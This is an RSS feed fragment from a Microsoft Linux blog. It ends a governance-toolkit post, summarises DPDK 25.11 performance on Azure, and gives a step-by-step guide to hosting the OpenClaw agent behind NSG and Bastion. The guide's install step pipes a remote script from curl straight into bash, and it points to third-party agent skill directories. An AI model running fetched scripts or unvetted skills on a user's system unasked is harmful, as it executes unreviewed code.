&lt;LI&gt;&lt;STRONG&gt;Community contributions&lt;/STRONG&gt;: Framework adapters, detection rules, and compliance mappings from the community expand coverage across ecosystems.&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;We are committed to open governance. We're releasing this project under Microsoft today, and we aspire to move it into a foundation home, such as the AI and Data Foundation (AAIF), where it can benefit from cross-industry stewardship. We're actively engaging with foundation partners on this path.&lt;/P&gt;
&lt;P&gt;The Agent Governance Toolkit is open source under the MIT license. Contributions welcome at&amp;nbsp;&lt;A class="lia-external-url" href="https://aka.ms/agent-governance-toolkit" target="_blank"&gt;github.com/microsoft/agent-governance-toolkit&lt;/A&gt;.&lt;/P&gt;</description>
      <pubDate>Fri, 10 Apr 2026 04:55:22 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/agent-governance-toolkit-architecture-deep-dive-policy-engines/ba-p/4510105</guid>
      <dc:creator>mosiddi</dc:creator>
      <dc:date>2026-04-10T04:55:22Z</dc:date>
    </item>
    <item>
      <title>DPDK 25.11 Performance on Azure for High-Speed Packet Workloads</title>
      <link>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/dpdk-25-11-performance-on-azure-for-high-speed-packet-workloads/ba-p/4424905</link>
      <description>&lt;P&gt;At Microsoft Azure, performance is treated as an ongoing discipline grounded in careful engineering and real-world validation. As cloud workloads grow in scale and variety, customers depend on consistent, high-throughput networking. Technologies such as the Data Plane Development Kit (DPDK) play a key role in meeting these expectations&lt;/P&gt;
&lt;P&gt;To support customers running advanced network functions, we’ve released our latest performance report based on DPDK 25.11. It is now available in the DPDK performance catalog (&lt;A href="https://fast.dpdk.org/doc/perf/DPDK_25_11_Microsoft_NIC_performance_report.pdf" target="_blank" rel="noopener"&gt;Microsoft Azure DPDK Performance Report)&lt;/A&gt;. The report provides a clear view of how DPDK performs on Microsoft-developed Azure Boost within Azure infrastructure, with detailed insights into packet processing across a range of scenarios, from small packet sizes to multi-core scaling.&lt;/P&gt;
&lt;H4&gt;Why We Test DPDK on Azure&lt;/H4&gt;
&lt;P&gt;DPDK is widely used for high-performance packet processing in virtualized environments. It powers a range of workloads from customer-deployed virtual network functions to internal Azure network appliances.&lt;/P&gt;
&lt;P&gt;But simply enabling DPDK is not enough. To ensure optimal performance, we validate it under realistic conditions, including:&lt;/P&gt;
&lt;UL data-spread="false"&gt;
&lt;LI&gt;Azure VM configurations with Accelerated Networking&lt;/LI&gt;
&lt;LI&gt;NUMA-aware memory and CPU alignment&lt;/LI&gt;
&lt;LI&gt;Hugepage-backed memory allocation&lt;/LI&gt;
&lt;LI&gt;Multi-core PMD thread scaling&lt;/LI&gt;
&lt;LI&gt;Packet forwarding using real traffic generators&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;This helps us understand how DPDK performs in actual cloud environments, not just idealized lab setups.&lt;/P&gt;
&lt;H4&gt;What the Report Covers&lt;/H4&gt;
&lt;P&gt;The DPDK 25.11 report includes performance benchmarks across different frame sizes, ranging from 64 bytes to 1518 bytes. It also evaluates CPU usage, queue configuration, and latency stability across various test conditions.&lt;/P&gt;
&lt;P&gt;Key Report Highlights:&lt;/P&gt;
&lt;UL data-spread="false"&gt;
&lt;LI&gt;Line-rate throughput is achievable at common frame sizes when vCPUs are pinned correctly and memory is properly configured&lt;/LI&gt;
&lt;LI&gt;Low jitter and consistent latency are observed across multi-queue and multi-core tests&lt;/LI&gt;
&lt;LI&gt;Performance scales nearly linearly with additional cores, especially for smaller packet sizes&lt;/LI&gt;
&lt;LI&gt;Queue and PMD thread alignment with the NUMA layout plays a critical role in maximizing efficiency&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;All tests were performed using Azure VM SKUs equipped with Microsoft NICs and configured for optimal isolation and performance.&lt;/P&gt;
&lt;H4&gt;Why We Shared This with the Community&lt;/H4&gt;
&lt;P&gt;Publishing this report reflects our commitment to open engineering and ecosystem collaboration. We believe performance transparency benefits everyone in the ecosystem, including developers, operators, and customers.&lt;/P&gt;
&lt;P&gt;Here are a few reasons why we share:&lt;/P&gt;
&lt;UL data-spread="false"&gt;
&lt;LI&gt;It helps customers plan and tune their workloads using validated performance envelopes&lt;/LI&gt;
&lt;LI&gt;It enables vendors and contributors to optimize drivers, firmware, and applications based on real-world data&lt;/LI&gt;
&lt;LI&gt;It encourages reproducibility and standardization in cloud DPDK benchmarking&lt;/LI&gt;
&lt;LI&gt;It creates a feedback loop between Azure, the DPDK community, and our partners&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Our goal is not just to test internally but to foster open dialogue and measurable improvement across platforms.&lt;/P&gt;
&lt;H4&gt;Recommendations for Running DPDK on Azure&lt;/H4&gt;
&lt;P&gt;Based on the test results, we offer the following best practices for customers deploying DPDK-based applications:&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="width: 73.3333%; border-width: 1px;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;th&gt;Area&lt;/th&gt;&lt;th&gt;Recommendation&lt;/th&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;VM Selection&lt;/td&gt;&lt;td&gt;Choose Accelerated Networking-enabled SKUs like D, Fsv2, or Eav4&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;CPU Pinning&lt;/td&gt;&lt;td&gt;Use dedicated cores for PMD threads and align with NUMA topology&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Memory&lt;/td&gt;&lt;td&gt;Configure hugepages and allocate memory from the local NUMA node&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Queue Mapping&lt;/td&gt;&lt;td&gt;Match RX and TX queues to available vCPUs to avoid contention&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Packet Generator&lt;/td&gt;&lt;td&gt;Use pktgen-dpdk or testpmd with controlled traffic profiles&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 24.7602%" /&gt;&lt;col style="width: 75.2594%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;These settings can significantly improve consistency and peak throughput across many DPDK scenarios.&lt;/P&gt;
&lt;H4&gt;Get Involved and Reproduce the Results&lt;/H4&gt;
&lt;P&gt;We invite you to read the full report and try the configurations in your own environment. Whether you are running a firewall, a router, or a telemetry appliance, DPDK on Azure offers scalable performance with the right tuning.&lt;/P&gt;
&lt;P&gt;You can:&lt;/P&gt;
&lt;UL data-spread="false"&gt;
&lt;LI&gt;Download the report at &lt;A href="https://fast.dpdk.org/doc/perf/DPDK_25_11_Microsoft_NIC_performance_report.pdf" target="_blank" rel="noopener"&gt;Microsoft Azure DPDK Performance Report&amp;nbsp;&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;Replicate the test setup using Azure VMs and your preferred packet generator &lt;A href="https://github.com/mcgov/dpdk-perf" target="_blank" rel="noopener" data-tabster="{&amp;quot;restorer&amp;quot;:{&amp;quot;type&amp;quot;:1}}"&gt;github.com/mcgov/dpdk-perf&lt;/A&gt;&amp;nbsp;&lt;/LI&gt;
&lt;LI&gt;Share your feedback with us through GitHub or community channels or send feedback&amp;nbsp;&lt;A href="mailto:dpdk@microsoft.com" target="_blank" rel="noopener" data-tabster="{&amp;quot;restorer&amp;quot;:{&amp;quot;type&amp;quot;:1}}"&gt;dpdk@microsoft.com&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;Suggest improvements or contribute new scenarios to future performance reports&lt;/LI&gt;
&lt;/UL&gt;
&lt;H3&gt;Conclusion&lt;/H3&gt;
&lt;P&gt;DPDK is a powerful enabler of high-performance networking in the cloud. With this report, we aim to make Azure performance data open, useful, and actionable. It reflects our ongoing investment in validating and improving the underlying infrastructure that supports mission-critical workloads.&lt;/P&gt;
&lt;P&gt;We thank the DPDK community for ongoing collaboration. We look forward to continued engagement as we scale performance transparency in cloud-native environments.&lt;/P&gt;</description>
      <pubDate>Wed, 01 Apr 2026 18:37:04 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/dpdk-25-11-performance-on-azure-for-high-speed-packet-workloads/ba-p/4424905</guid>
      <dc:creator>KashanK</dc:creator>
      <dc:date>2026-04-01T18:37:04Z</dc:date>
    </item>
    <item>
      <title>Run OpenClaw Agents on Azure Linux VMs (with Secure Defaults)</title>
      <link>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/run-openclaw-agents-on-azure-linux-vms-with-secure-defaults/ba-p/4502944</link>
      <description>&lt;P data-source-line="7"&gt;Many teams want an enterprise-ready personal AI assistant, but they need it on infrastructure they control, with security boundaries they can explain to IT. That is exactly where OpenClaw fits on Azure.&lt;/P&gt;
&lt;P data-source-line="9"&gt;&lt;STRONG&gt;OpenClaw is a self-hosted, always-on personal agent runtime you run in your enterprise environment and Azure infrastructure.&lt;/STRONG&gt; Instead of relying only on a hosted chat app from a third-party provider, you can deploy, operate, and experiment with &lt;STRONG&gt;an agent on an Azure Linux VM you control&lt;/STRONG&gt; — &lt;STRONG&gt;using your existing GitHub Copilot licenses, Azure OpenAI deployments, or API plans from OpenAI, Anthropic Claude, Google Gemini, and other model providers you already subscribe to&lt;/STRONG&gt;. Once deployed on Azure, you can interact with an OpenClaw agent through familiar channels like Microsoft Teams, Slack, Telegram, WhatsApp, and many more!&lt;/P&gt;
&lt;P data-source-line="11"&gt;For Azure users, this gives you a practical middle ground: modern personal-agent workflows on familiar Azure infrastructure.&lt;/P&gt;
&lt;H2 data-source-line="13"&gt;What is OpenClaw, and how is it different from ChatGPT/Claude/chat apps?&lt;/H2&gt;
&lt;P data-source-line="15"&gt;OpenClaw is a self-hosted personal agent runtime that can be hosted on Azure compute infrastructure.&lt;/P&gt;
&lt;P data-source-line="17"&gt;How it differs:&lt;/P&gt;
&lt;UL data-source-line="19"&gt;
&lt;LI data-source-line="19"&gt;&lt;STRONG&gt;ChatGPT/Claude apps&lt;/STRONG&gt;&amp;nbsp;are primarily hosted chat experiences tied to one provider's models&lt;/LI&gt;
&lt;LI data-source-line="20"&gt;&lt;STRONG&gt;OpenClaw&lt;/STRONG&gt;&amp;nbsp;is an always-on runtime you operate yourself, backed by&amp;nbsp;&lt;STRONG&gt;your choice of model provider&lt;/STRONG&gt;&amp;nbsp;— GitHub Copilot, Azure OpenAI, OpenAI, Anthropic Claude, Google Gemini, and others&lt;/LI&gt;
&lt;LI data-source-line="21"&gt;&lt;STRONG&gt;OpenClaw&lt;/STRONG&gt; lets you keep the runtime boundary in your own Azure VM environment within your Azure enterprise subscription&lt;/LI&gt;
&lt;/UL&gt;
&lt;P data-source-line="23"&gt;In practice, OpenClaw is useful when you want a persistent assistant for operational and workflow tasks, with your own infrastructure as the control point. You bring whatever model provider and API plan you already have — OpenClaw connects to it.&lt;/P&gt;
&lt;H2 data-source-line="25"&gt;Why Azure Linux VMs?&lt;/H2&gt;
&lt;P data-source-line="27"&gt;Azure Linux VMs are a strong fit because they provide:&lt;/P&gt;
&lt;UL data-source-line="29"&gt;
&lt;LI data-source-line="29"&gt;&lt;STRONG&gt;A suitable host machine for the OpenClaw agent to run on&lt;/STRONG&gt;&lt;/LI&gt;
&lt;LI data-source-line="29"&gt;Enterprise-friendly infrastructure and identity workflows&lt;/LI&gt;
&lt;LI data-source-line="30"&gt;Repeatable provisioning via the Azure CLI&lt;/LI&gt;
&lt;LI data-source-line="31"&gt;Network hardening with NSG rules&lt;/LI&gt;
&lt;LI data-source-line="32"&gt;Managed SSH access through Azure Bastion instead of public SSH exposure&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2 data-source-line="34"&gt;How to Set Up OpenClaw on an Azure Linux VM&lt;/H2&gt;
&lt;P data-source-line="36"&gt;This guide sets up an Azure Linux VM, applies NSG (Network Security Group) hardening, configures Azure Bastion for managed SSH access, and &lt;STRONG&gt;installs an always-on OpenClaw agent within the VM&lt;/STRONG&gt; that you can interact with through various messaging channels.&lt;/P&gt;
&lt;H3 data-source-line="38"&gt;What you'll do&lt;/H3&gt;
&lt;UL data-source-line="40"&gt;
&lt;LI data-source-line="40"&gt;Create Azure networking (VNet, subnets, NSG) and compute resources with the Azure CLI&lt;/LI&gt;
&lt;LI data-source-line="41"&gt;Apply Network Security Group rules so VM SSH is allowed only from Azure Bastion&lt;/LI&gt;
&lt;LI data-source-line="42"&gt;Use Azure Bastion for SSH access (no public IP on the VM)&lt;/LI&gt;
&lt;LI data-source-line="43"&gt;Install OpenClaw on the Azure VM&lt;/LI&gt;
&lt;LI data-source-line="44"&gt;Verify OpenClaw installation and configuration on the VM&lt;/LI&gt;
&lt;/UL&gt;
&lt;H3 data-source-line="46"&gt;What you need&lt;/H3&gt;
&lt;UL data-source-line="48"&gt;
&lt;LI data-source-line="48"&gt;An Azure subscription with permission to create compute and network resources&lt;/LI&gt;
&lt;LI data-source-line="49"&gt;Azure CLI installed (&lt;A href="https://learn.microsoft.com/cli/azure/install-azure-cli" target="_blank"&gt;install steps&lt;/A&gt;)&lt;/LI&gt;
&lt;LI data-source-line="50"&gt;An SSH key pair (the guide covers generating one if needed)&lt;/LI&gt;
&lt;LI data-source-line="51"&gt;~20–30 minutes&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2 data-source-line="53"&gt;Configure deployment&lt;/H2&gt;
&lt;H3 data-source-line="55"&gt;Step 1: Sign in to Azure CLI&lt;/H3&gt;
&lt;LI-CODE lang="bash"&gt;az login                     # Select a suitable Azure subscription during Azure login
az extension add -n ssh      # SSH extension is required for Azure Bastion SSH&lt;/LI-CODE&gt;
&lt;P data-source-line="62"&gt;The ssh extension is required for Azure Bastion native SSH tunneling.&lt;/P&gt;
&lt;H3 data-source-line="64"&gt;Step 2: Register required resource providers (one-time)&lt;/H3&gt;
&lt;P&gt;Register required Azure Resource Providers (one time registration):&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;az provider register --namespace Microsoft.Compute
az provider register --namespace Microsoft.Network&lt;/LI-CODE&gt;
&lt;P data-source-line="71"&gt;Verify registration. Wait until both show &lt;EM&gt;Registered&lt;/EM&gt;.&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;az provider show --namespace Microsoft.Compute --query registrationState -o tsv
az provider show --namespace Microsoft.Network --query registrationState -o tsv&lt;/LI-CODE&gt;
&lt;H3 data-source-line="78"&gt;Step 3: Set deployment variables&lt;/H3&gt;
&lt;P&gt;Set the deployment environment variables that will be needed throughout this guide.&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;RG="rg-openclaw"
LOCATION="westus2"
VNET_NAME="vnet-openclaw"
VNET_PREFIX="10.40.0.0/16"
VM_SUBNET_NAME="snet-openclaw-vm"
VM_SUBNET_PREFIX="10.40.2.0/24"
BASTION_SUBNET_PREFIX="10.40.1.0/26"
NSG_NAME="nsg-openclaw-vm"
VM_NAME="vm-openclaw"
ADMIN_USERNAME="openclaw"
BASTION_NAME="bas-openclaw"
BASTION_PIP_NAME="pip-openclaw-bastion"&lt;/LI-CODE&gt;
&lt;P data-source-line="95"&gt;Adjust names and CIDR ranges to fit your environment. The Bastion subnet must be at least &lt;EM&gt;/26&lt;/EM&gt;.&lt;/P&gt;
&lt;H3 data-source-line="97"&gt;Step 4: Select SSH key&lt;/H3&gt;
&lt;P data-source-line="99"&gt;Use your existing public key if you have one:&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;SSH_PUB_KEY="$(cat ~/.ssh/id_ed25519.pub)"&lt;/LI-CODE&gt;
&lt;P data-source-line="105"&gt;If you don't have an SSH key yet, generate one:&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;ssh-keygen -t ed25519 -a 100 -f ~/.ssh/id_ed25519 -C "you@example.com"
SSH_PUB_KEY="$(cat ~/.ssh/id_ed25519.pub)"&lt;/LI-CODE&gt;
&lt;H3 data-source-line="112"&gt;Step 5: Select VM size and OS disk size&lt;/H3&gt;
&lt;LI-CODE lang="bash"&gt;VM_SIZE="Standard_B2as_v2"
OS_DISK_SIZE_GB=64&lt;/LI-CODE&gt;
&lt;P data-source-line="119"&gt;Choose a VM size and OS disk size available in your subscription and region:&lt;/P&gt;
&lt;UL data-source-line="121"&gt;
&lt;LI data-source-line="121"&gt;Start smaller for light usage and scale up later&lt;/LI&gt;
&lt;LI data-source-line="122"&gt;Use more vCPU/RAM/disk for heavier automation, more channels, or larger model/tool workloads&lt;/LI&gt;
&lt;LI data-source-line="123"&gt;If a VM size is unavailable in your region or subscription quota, pick the closest available SKU&lt;/LI&gt;
&lt;/UL&gt;
&lt;P data-source-line="125"&gt;List VM sizes available in your target region:&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;az vm list-skus --location "${LOCATION}" --resource-type virtualMachines -o table&lt;/LI-CODE&gt;
&lt;P data-source-line="131"&gt;Check your current vCPU and disk usage/quota:&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;az vm list-usage --location "${LOCATION}" -o table&lt;/LI-CODE&gt;
&lt;H2 data-source-line="137"&gt;Deploy Azure resources&lt;/H2&gt;
&lt;H3 data-source-line="139"&gt;Step 1: Create the resource group&lt;/H3&gt;
&lt;P&gt;The Azure resource group will contain all of the Azure resources that the OpenClaw agent needs.&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;az group create -n "${RG}" -l "${LOCATION}"&lt;/LI-CODE&gt;
&lt;H3 data-source-line="145"&gt;Step 2: Create the network security group&lt;/H3&gt;
&lt;P data-source-line="147"&gt;Create the NSG and add rules so only the Bastion subnet can SSH into the VM.&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;az network nsg create \
  -g "${RG}" -n "${NSG_NAME}" -l "${LOCATION}"

# Allow SSH from the Bastion subnet only
az network nsg rule create \
  -g "${RG}" --nsg-name "${NSG_NAME}" \
  -n AllowSshFromBastionSubnet --priority 100 \
  --access Allow --direction Inbound --protocol Tcp \
  --source-address-prefixes "${BASTION_SUBNET_PREFIX}" \
  --destination-port-ranges 22

# Deny SSH from the public internet
az network nsg rule create \
  -g "${RG}" --nsg-name "${NSG_NAME}" \
  -n DenyInternetSsh --priority 110 \
  --access Deny --direction Inbound --protocol Tcp \
  --source-address-prefixes Internet \
  --destination-port-ranges 22

# Deny SSH from other VNet sources
az network nsg rule create \
  -g "${RG}" --nsg-name "${NSG_NAME}" \
  -n DenyVnetSsh --priority 120 \
  --access Deny --direction Inbound --protocol Tcp \
  --source-address-prefixes VirtualNetwork \
  --destination-port-ranges 22&lt;/LI-CODE&gt;
&lt;P data-source-line="178"&gt;The rules are evaluated by priority (lowest number first): Bastion traffic is allowed at 100, then all other SSH is blocked at 110 and 120.&lt;/P&gt;
&lt;H3 data-source-line="180"&gt;Step 3: Create the virtual network and subnets&lt;/H3&gt;
&lt;P data-source-line="182"&gt;Create the VNet with the VM subnet (NSG attached), then add the Bastion subnet.&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;az network vnet create \
  -g "${RG}" -n "${VNET_NAME}" -l "${LOCATION}" \
  --address-prefixes "${VNET_PREFIX}" \
  --subnet-name "${VM_SUBNET_NAME}" \
  --subnet-prefixes "${VM_SUBNET_PREFIX}"

# Attach the NSG to the VM subnet
az network vnet subnet update \
  -g "${RG}" --vnet-name "${VNET_NAME}" \
  -n "${VM_SUBNET_NAME}" --nsg "${NSG_NAME}"

# AzureBastionSubnet — name is required by Azure
az network vnet subnet create \
  -g "${RG}" --vnet-name "${VNET_NAME}" \
  -n AzureBastionSubnet \
  --address-prefixes "${BASTION_SUBNET_PREFIX}"&lt;/LI-CODE&gt;
&lt;H3 data-source-line="203"&gt;Step 4: Create the Virtual Machine&lt;/H3&gt;
&lt;P data-source-line="205"&gt;Create the VM with no public IP. SSH access for OpenClaw configuration will be exclusively through Azure Bastion.&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;az vm create \
  -g "${RG}" -n "${VM_NAME}" -l "${LOCATION}" \
  --image "Canonical:ubuntu-24_04-lts:server:latest" \
  --size "${VM_SIZE}" \
  --os-disk-size-gb "${OS_DISK_SIZE_GB}" \
  --storage-sku StandardSSD_LRS \
  --admin-username "${ADMIN_USERNAME}" \
  --ssh-key-values "${SSH_PUB_KEY}" \
  --vnet-name "${VNET_NAME}" \
  --subnet "${VM_SUBNET_NAME}" \
  --public-ip-address "" \
  --nsg ""&lt;/LI-CODE&gt;
&lt;P data-source-line="222"&gt;&lt;EM&gt;--public-ip-address "" &lt;/EM&gt;prevents a public IP from being assigned.&lt;/P&gt;
&lt;P data-source-line="222"&gt;&lt;EM&gt;--nsg "" &lt;/EM&gt;skips creating a per-NIC NSG (the subnet-level NSG created earlier handles security).&lt;/P&gt;
&lt;P data-source-line="248"&gt;&lt;STRONG&gt;Reproducibility:&lt;/STRONG&gt; The command above uses latest for the &lt;EM&gt;Ubuntu image&lt;/EM&gt;. To pin a specific version, list available versions and replace &lt;EM&gt;latest&lt;/EM&gt;:&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;az vm image list \
  --publisher Canonical --offer ubuntu-24_04-lts \
  --sku server --all -o table&lt;/LI-CODE&gt;
&lt;H3 data-source-line="232"&gt;Step 5: Create Azure Bastion&lt;/H3&gt;
&lt;P data-source-line="234"&gt;Azure Bastion provides secure-managed SSH access to the VM without exposing a public IP.&lt;/P&gt;
&lt;P data-source-line="234"&gt;Bastion Standard SKU with tunneling is required for CLI-based "az network bastion ssh" command.&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;az network public-ip create \
  -g "${RG}" -n "${BASTION_PIP_NAME}" -l "${LOCATION}" \
  --sku Standard --allocation-method Static

az network bastion create \
  -g "${RG}" -n "${BASTION_NAME}" -l "${LOCATION}" \
  --vnet-name "${VNET_NAME}" \
  --public-ip-address "${BASTION_PIP_NAME}" \
  --sku Standard --enable-tunneling true&lt;/LI-CODE&gt;
&lt;P data-source-line="248"&gt;Bastion provisioning typically takes 5–10 minutes but can take up to 15–30 minutes in some regions.&lt;/P&gt;
&lt;H3 data-source-line="248"&gt;Step 6: Verify Deployments&lt;/H3&gt;
&lt;P data-source-line="248"&gt;After all resources are deployed, your resource group should look like the following:&lt;/P&gt;
&lt;img /&gt;
&lt;H2 data-source-line="250"&gt;Install OpenClaw&lt;/H2&gt;
&lt;H3 data-source-line="252"&gt;Step 1: SSH into the VM through Azure Bastion&lt;/H3&gt;
&lt;LI-CODE lang="bash"&gt;VM_ID="$(az vm show -g "${RG}" -n "${VM_NAME}" --query id -o tsv)"

az network bastion ssh \
  --name "${BASTION_NAME}" \
  --resource-group "${RG}" \
  --target-resource-id "${VM_ID}" \
  --auth-type ssh-key \
  --username "${ADMIN_USERNAME}" \
  --ssh-key ~/.ssh/id_ed25519&lt;/LI-CODE&gt;
&lt;H3 data-source-line="266"&gt;Step 2: Install OpenClaw (in the Bastion SSH shell)&lt;/H3&gt;
&lt;LI-CODE lang="bash"&gt;curl -fsSL https://openclaw.ai/install.sh | bash&lt;/LI-CODE&gt;
&lt;P data-source-line="274"&gt;The installer installs Node LTS and dependencies if not already present, installs OpenClaw, and launches the &lt;STRONG&gt;OpenClaw onboarding wizard&lt;/STRONG&gt;. For more information, see the &lt;A class="lia-external-url" href="https://docs.openclaw.ai/install" target="_blank"&gt;open source OpenClaw install docs&lt;/A&gt;.&lt;/P&gt;
&lt;H4 data-source-line="274"&gt;OpenClaw Onboarding: Choosing an AI Model Provider&lt;/H4&gt;
&lt;P data-source-line="274"&gt;During OpenClaw onboarding, you'll choose the &lt;STRONG&gt;AI &lt;/STRONG&gt;&lt;STRONG&gt;model provider for the OpenClaw agent&lt;/STRONG&gt;. This can be&amp;nbsp;GitHub Copilot, Azure OpenAI, OpenAI, Anthropic Claude, Google Gemini, or another supported provider. See the &lt;A class="lia-external-url" href="https://docs.openclaw.ai/install" target="_blank"&gt;open source OpenClaw install docs&lt;/A&gt; for details on choosing an AI model provider when going through the onboarding wizard.&lt;/P&gt;
&lt;P data-source-line="284"&gt;Most enterprise Azure teams already have GitHub Copilot licenses. If that is your case, we recommend choosing the GitHub Copilot provider in the OpenClaw onboarding wizard. See the &lt;A class="lia-external-url" href="https://docs.openclaw.ai/providers/github-copilot" target="_blank"&gt;open source OpenClaw docs on configuring &lt;STRONG&gt;GitHub Copilot as the AI model provider&lt;/STRONG&gt;&lt;/A&gt;.&lt;/P&gt;
&lt;H4 data-source-line="284"&gt;OpenClaw Onboarding: Setting up Messaging Channels&lt;/H4&gt;
&lt;P&gt;During OpenClaw onboarding, there will be an optional step where you can set up various messaging channels to interact with your OpenClaw agent.&lt;/P&gt;
&lt;P&gt;For first time users, we recommend setting up Telegram due to ease of setup. Other messaging channels such as Microsoft Teams, Slack, WhatsApp, and others can also be set up.&lt;/P&gt;
&lt;P&gt;To configure &lt;STRONG&gt;OpenClaw for messaging through chat channels&lt;/STRONG&gt;, see the &lt;A class="lia-external-url" href="https://docs.openclaw.ai/channels" target="_blank"&gt;open source OpenClaw chat channels docs&lt;/A&gt;.&lt;/P&gt;
&lt;H3 data-source-line="276"&gt;Step 3: Verify OpenClaw Configuration&lt;/H3&gt;
&lt;P data-source-line="278"&gt;To validate that everything was set up correctly, run the following commands within the same Bastion SSH session:&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;openclaw status
openclaw gateway status&lt;/LI-CODE&gt;&lt;img /&gt;
&lt;P&gt;If there are any issues reported, you can run the onboarding wizard again with the steps above. Alternatively, you can run the following command:&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;openclaw doctor&lt;/LI-CODE&gt;
&lt;H2&gt;Message OpenClaw&lt;/H2&gt;
&lt;P&gt;Once you have configured the OpenClaw agent to be reachable via various messaging channels, you can verify that it is responsive by messaging it.&lt;/P&gt;
&lt;img /&gt;
&lt;H2&gt;Enhancing OpenClaw for Use Cases&lt;/H2&gt;
&lt;P&gt;There you go! You now have a 24/7, always-on personal AI agent, living on its own Azure VM environment.&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;For awesome OpenClaw use cases, check out the &lt;A class="lia-external-url" href="https://github.com/hesamsheikh/awesome-openclaw-usecases" target="_blank"&gt;awesome-openclaw-usecases repository&lt;/A&gt;.&lt;/LI&gt;
&lt;LI&gt;To enhance your OpenClaw agent with additional AI skills so that it can autonomously perform multi-step operations on any domain, check out the&amp;nbsp;&lt;A class="lia-external-url" href="https://github.com/VoltAgent/awesome-openclaw-skills" target="_blank"&gt;awesome-openclaw-skills repository&lt;/A&gt;.&lt;/LI&gt;
&lt;LI&gt;You can also check out &lt;A class="lia-external-url" href="https://clawhub.ai/" target="_blank"&gt;ClawHub&lt;/A&gt;&amp;nbsp;and &lt;A class="lia-external-url" href="https://clawskills.sh/" target="_blank"&gt;ClawSkills&lt;/A&gt;, two popular open source skills directories that can enhance your OpenClaw agent.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2&gt;Cleanup&lt;/H2&gt;
&lt;P&gt;&lt;SPAN data-as="p"&gt;To delete all resources created by this guide:&lt;/SPAN&gt;&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;az group delete -n "${RG}" --yes --no-wait&lt;/LI-CODE&gt;
&lt;P&gt;&lt;SPAN data-as="p"&gt;This removes the resource group and everything inside it (VM, VNet, NSG, Bastion, public IP). &lt;/SPAN&gt;&lt;SPAN data-as="p"&gt;This also deletes the OpenClaw agent running within the VM.&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;If you'd like to dive deeper about deploying OpenClaw on Azure, please check out the &lt;A class="lia-external-url" href="https://docs.openclaw.ai/install/azure" target="_blank"&gt;open source OpenClaw on Azure docs&lt;/A&gt;.&lt;/P&gt;</description>
      <pubDate>Sun, 22 Mar 2026 16:34:46 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/run-openclaw-agents-on-azure-linux-vms-with-secure-defaults/ba-p/4502944</guid>
      <dc:creator>johnsonshi_msft</dc:creator>
      <dc:date>2026-03-22T16:34:46Z</dc:date>
    </item>
  </channel>
</rss>

